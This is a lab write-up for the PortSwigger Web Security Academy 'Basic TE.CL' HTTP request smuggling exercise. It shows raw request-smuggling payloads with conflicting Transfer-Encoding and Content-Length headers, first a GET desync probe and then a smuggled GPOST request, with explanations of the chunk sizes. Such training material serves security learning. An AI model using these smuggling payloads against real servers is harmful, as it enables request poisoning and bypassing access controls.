| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | HTTP Request Smuggling — TE.CL |
| Difficulty | Practitioner |
| Objective | Cause the back-end to process a request with the method GPOST |
HTTP Request Smuggling, Basic TE.CL Vulnerability¶
Intercepting the root request, switching to POST and HTTP/1.1, removing unnecessary headers. TE.CL setup — front-end uses Transfer-Encoding, back-end uses Content-Length.
Crafting a TE.CL payload and confirming the desync works with a GET /miku probe:
POST / HTTP/1.1
Host: 0a790062032cc5bd8313aab300bf001b.web-security-academy.net
Transfer-Encoding: chunked
Content-Length: 4
33
GET /miku HTTP/1.1
Content-Length: 20
teto=teto
0
Content-Length: 4 tells the back-end to read only 4 bytes — the chunk size line (33\r\n). Everything below — GET /miku... — gets left in the buffer as the next request.
404 Not Found on the probe — desync confirmed.
Same approach as the CL.TE GPOST lab, just from the TE.CL direction. We put GPOST as the method in the smuggled request. The chunk size needs to be recalculated since GPOST is one character longer than GET — 0x35 instead of 0x33:
POST / HTTP/1.1
Host: 0a790062032cc5bd8313aab300bf001b.web-security-academy.net
Transfer-Encoding: chunked
Content-Length: 4
35
GPOST /miku HTTP/1.1
Content-Length: 20
teto=teto
0
Sending twice — the second request receives Unrecognized method GPOST:
We force the GPOST and the error will get the lab solved